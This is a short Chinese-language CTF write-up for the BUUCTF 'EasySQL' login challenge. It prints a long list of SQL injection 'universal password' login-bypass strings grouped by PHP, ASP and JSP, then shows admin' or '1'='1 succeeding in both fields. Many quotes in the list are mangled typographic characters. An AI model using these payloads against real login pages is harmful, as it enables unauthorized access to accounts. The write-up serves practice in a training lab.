CTF-Web-[极客大挑战2019]EasySQL

博客说明

CTP平台

网址

题目

Web类，[极客大挑战2019]EasySQL

打开题目的实例

思路

题目类型是Web类型的，而且是一个登录页面，首先考虑的是否是SQL注入，这里提供一下万能密码表

万能密码表 （收集于网络）

语言 万能密码 PHP ‘or 1=1/*
“or “a”=”a
“or 1=1–
“or”=”
“or”=”a’=’a
“or1=1–
“or=or”
”or’=’or’
‘) or (‘a’=’a
‘.).or.(‘.a.’=’.a
‘or 1=1
‘or 1=1–
‘or 1=1/*
‘or”=”a’=’a
‘or’ ‘1’=’1′
‘or”=’
‘or”=”or”=’
‘or’=’1’
‘or’=’or’
‘or.’a.’=’a
‘or1=1–
1’or’1’=’1
a’or’ 1=1–
a’or’1=1–
or ‘a’=’a’
or 1=1–
or1=1– asp aspx “or “a”=”a
‘.).or.(‘.a.’=’.a
or 1=1–
‘or 1=1–
a’or’ 1=1–
“or 1=1–
‘or.’a.’=’a
“or”=”a’=’a
‘or”=’
or’=’or’ jsp 1’or’1’=’1
admin’ or 1=1/*

查看源代码

发现是php写的，于是使用php的万能密码尝试

 admin' or '1'='1  

拼接的sql语句为

 username=admin' or '1'='1&password=admin' or '1'='1  

发现已经成功登录

感谢

BUUCTF

以及勤劳的自己